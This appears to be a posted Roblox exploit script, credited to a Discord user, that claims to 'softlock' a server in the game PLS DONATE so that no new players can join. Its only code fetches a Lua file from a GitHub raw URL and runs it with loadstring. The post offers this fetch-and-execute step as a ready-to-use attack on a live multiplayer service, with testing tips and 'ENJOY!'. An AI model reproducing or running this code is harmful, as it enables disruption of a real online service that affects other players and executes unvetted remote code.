Created by IDoN0t / DimitriKirilov#7315
Features:
- SOFTLOCK SERVER
- DEV NOTES:
If you don’t die after ~3 seconds or there are any errors please dm me on discord.
No new people can join that server.
You can test it by using iy’s rejoin command before execution & after to see the difference.
https://i.imgur.com/fKJYw5u.png || On Join
https://i.imgur.com/qIPS1ww.png || What happens to ReplicatedStorage after execution
local request = request or (syn and syn.request)
local response = request({
Method = "GET",
Url = "https://raw.githubusercontent.com/25-67/rblx-exploiting/main/pls-donate_softlock.lua"
})
loadstring(response.Body)()
ENJOY!